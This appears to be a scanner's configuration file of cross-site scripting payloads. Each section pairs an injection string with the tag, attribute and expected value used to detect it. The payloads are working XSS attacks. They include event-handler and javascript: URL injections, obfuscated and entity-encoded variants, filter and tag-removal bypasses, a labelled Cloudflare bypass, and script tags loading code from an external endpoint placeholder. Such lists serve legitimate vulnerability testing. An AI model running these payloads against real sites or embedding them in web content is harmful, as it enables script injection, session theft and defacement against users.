[DEFAULT]
payload = None
tag = None
value = None
attribute = None
match_type = exact
requirements = None
case_sensitive = yes
close_tag = yes
payload_type = pattern
injection_type = javascript

[case_script_alert_regex]
payload = <ScRiPt>alert(09876543210)</sCrIpT>
tag = script
attribute = full_string
value = alert(09876543210)
case_sensitive = yes

; Look mah! No whitespace! No script tags! No closing tag
[svg_onload_alert_regex_left_open]
payload = '"><SvG/oNloAd=alert(09876543210)>//
tag = svg
attribute = onload
value = alert(09876543210)
case_sensitive = yes
match_type = starts_with

[tab_img_onerror_alert]
payload = "><SvG/OnLoad=confirm(09876543210)>"@gmail.com
tag = svg
attribute = onload
value = confirm(09876543210)
case_sensitive = yes

[script_protocol_src]
payload = <ScRiPt src=//[PROTO_ENDPOINT]__XSS__z.js></ScRiPt>
tag = script
attribute = src
value = //[PROTO_ENDPOINT]__XSS__z.js
case_sensitive = no

[script_alert_parentheses_regex]
payload = <ScRiPt>(alert)(/__XSS__/);</ScRiPt>
tag = script
attribute = full_string
value = (alert)(/__XSS__/);
case_sensitive = yes

; No slash :)
[img_onerror_alert_double_quote]
payload = <ImG src=z oNeRror=alert(09876543210)>
tag = img
attribute = onerror
value = alert(09876543210)
case_sensitive = yes

[object_data_alert_quote]
payload = <object data="javascript:alert(09876543210)">
tag = object
attribute = data
value = javascript:alert(09876543210)
case_sensitive = yes

[iframe_src_javascript]
payload = <iFrAme src="jAvasCript:alert(/__XSS__/);"></iframe>
tag = iframe
attribute = src
value = javascript:alert(/__XSS__/)
case_sensitive = yes

[details_ontoggle]
payload = "'><details open ontoggle=confirm((09876543210))>
tag = details
attribute = ontoggle
value = confirm((09876543210))
case_sensitive = yes

[body_onpageshow]
payload = <body/oNpagEshoW=(confirm)(/__XSS__/)>
tag = body
attribute = onpageshow
value = (confirm)(/__XSS__/)
case_sensitive = yes

[a_autofocus]
payload = <a[LF]autofocus[LF]onfocus='(function(){return window})()["alert"]("__XSS__")'[LF]href>
tag = a
attribute = onfocus
value = (function(){return window})()["alert"]("__XSS__")
case_sensitive = yes

; In a frameset, close the current frame then inject this one
[frame_src_javascript]
payload = <frame src="javascript:alert(/__XSS__/)"/>
tag = frame
attribute = src
value = javascript:alert(/__XSS__/)
case_sensitive = yes

; If we have control over the frame src attribute (at least beginning) just change the URL
[frames_src_inject]
payload = javascript:alert(/__XSS__/)//
tag = frame,iframe
attribute = src
value = javascript:alert(/__XSS__/)//
case_sensitive = yes
close_tag = no
match_type = starts_with

; If we have control over a script attribute that is not "src," try adding it
[js_src_inject]
payload = 42 src=[EXTERNAL_ENDPOINT]__XSS__z.js
tag = script
attribute = src
value = [EXTERNAL_ENDPOINT]__XSS__z.js
case_sensitive = yes
close_tag = no
match_type = starts_with

[svg_animate]
payload = ><svg><animate onbegin=prompt(/__XSS__/) attributeName=u dur=1s>
tag = animate
attribute = onbegin
value = prompt(/__XSS__/)
case_sensitive = yes

; Try injecting whitespaces...
[case_tab_script_absolute_src]
payload = <ScRiPt[TAB]src=[EXTERNAL_ENDPOINT]__XSS__z.js></sCrIpT>
tag = script
attribute = src
value = [EXTERNAL_ENDPOINT]__XSS__z.js
case_sensitive = no

; Bypass remove of tags
[script_tag_remove_alert_quote]
payload = <scr<script>ipt>(alert)(/__XSS__/)//</scr</script>ipt>
tag = script
attribute = full_string
value = alert(/__XSS__/)//
case_sensitive = yes
match_type = starts_with

[cloudflare_bypass]
payload = <img src onerror=&emsp;prompt`${/__XSS__/}`>
tag = img
attribute = onerror
value = &emsp;prompt`${/__XSS__/}`
case_sensitive = yes

[script_comment]
payload = <sCrIpt><!--[LF]confirm(/__XSS__/)//--></sCrIpt>
tag = script
attribute = full_string
value = confirm(/__XSS__/)
case_sensitive = yes

[img_onerror_bypass_some_removals]
payload = <img src=k onerror=prompt`__XSS__`>
tag = img
attribute = onerror
value = prompt`__XSS__`
case_sensitive = yes

; svg payload than can be mixed case + no parenthesis + no slash. Search for decoded payload because of parser behavior
[svg_onload_encoded_alert]
payload = <svg onload=&#x61&#x6C&#x65&#x72&#x74&#x28&#x27__XSS__&#x27&#x29>
tag = svg
attribute = onload
value = alert('__XSS__')
case_sensitive = no

; try to evade various rules
[input_autofocus]
payload = <input autofocus onfocus =top[(584390752*16).toString(32-1*2)](/__XSS___/)>
tag = input
attribute = onfocus
value = top[(584390752*16).toString(32-1*2)](/__XSS___/)
case_sensitive = yes

[resource_onload_onerror_event]
payload = [ATTR_SEP]onload=[VALUE_SEP]alert(/__XSS__/)[ATTR_SEP]onerror=[VALUE_SEP]alert(/__XSS__/)
tag = img,image,svg,audio,video,style,iframe
attribute = onload
value = alert(/__XSS__/)
case_sensitive = yes
close_tag = no
requirements = src

[onfocus_autofocus_event]
payload = [ATTR_SEP]autofocus/onfocus=[VALUE_SEP]alert(/__XSS__/)
tag = iframe,button,select,textarea
attribute = onfocus
value = alert(/__XSS__/)
case_sensitive = yes
close_tag = no

[onfocus_autofocus_a]
payload = [ATTR_SEP]autofocus href onfocus=[VALUE_SEP]prompt(/__XSS__/)
tag = a
attribute = onfocus
value = prompt(/__XSS__/)
case_sensitive = yes
close_tag = no

[onfocus_autofocus_a_no_slash]
payload = [ATTR_SEP]autofocus href onfocus=[VALUE_SEP]((x)=>(confirm)(x))(`__XSS__`)
tag = a
attribute = onfocus
value = ((x)=>(confirm)(x))(`__XSS__`)
case_sensitive = yes
close_tag = no

[onfocus_autofocusin_a]
payload = [ATTR_SEP]autofocus href onfocusin=[VALUE_SEP]x=&#x27;al&#x27;;x+=&#x27;ert&#x27;;window[x](&#x27;__XSS__&#x27;)[VALUE_SEP]color=
tag = a
attribute = onfocusin
value = x='al';x+='ert';window[x]('__XSS__')
case_sensitive = yes
close_tag = no

[input_not_hidden_onfocus_autofocus_event]
payload = [ATTR_SEP]autofocus/onfocus=[VALUE_SEP]alert(/__XSS__/)
tag = input
attribute = onfocus
value = alert(/__XSS__/)
case_sensitive = yes
close_tag = no
requirements = type!=hidden

[tag_bigstyle_onmouseover_event]
payload = [ATTR_SEP]style=[VALUE_SEP]width:100%;height:100%;position:fixed;left:0px;top:0px;[ATTR_SEP]onmouseover=[VALUE_SEP]alert(/__XSS__/)
tag = a,body,div,h1,h2,h3,h4,h5,h6,header,hr,html,footer,nav,p,section,span,summary,button,form,label,legend,meter,option,select,textarea,abbr,acronym,address,blockquote,cite,code,frame,iframe,img,table,pre,tbody
attribute = onmouseover
value = alert(/__XSS__/)
case_sensitive = yes
close_tag = no
requirements = !style

[link_stylesheet_onload_event]
payload = [ATTR_SEP]href onerRor=[VALUE_SEP]((prompt))`__XSS__`[VALUE_SEP]id=[VALUE_SEP]
tag = link
attribute = onerror
value = ((prompt))`__XSS__`
case_sensitive = yes
close_tag = no
requirements = rel=stylesheet

[unknown_tag_and_event]
payload = <custom[LF]checked[LF]onpointerenter="x='pr',y=top;x+='ompt';y[x]('__XSS__')"style="position:absolute;top:0;height:2000px;background-color:red;width:2000px;left:0;z-index:9998;">XSS</custom[LF]tags>
tag = custom
attribute = onpointerenter
value = x='pr',y=top;x+='ompt';y[x]('__XSS__')
case_sensitive = yes

; Requires interaction
[a_href_inject]
payload = javascript:alert(/__XSS__/)//
tag = a
attribute = href
value = javascript:alert(/__XSS__/)//
case_sensitive = yes
close_tag = no
match_type = starts_with

; Fallback to HTML injection if nothing worked
[html_inject]
payload = <div id="__XSS__">yolo</div>
tag = div
attribute = id
value = __XSS__
case_sensitive = yes
injection_type = html
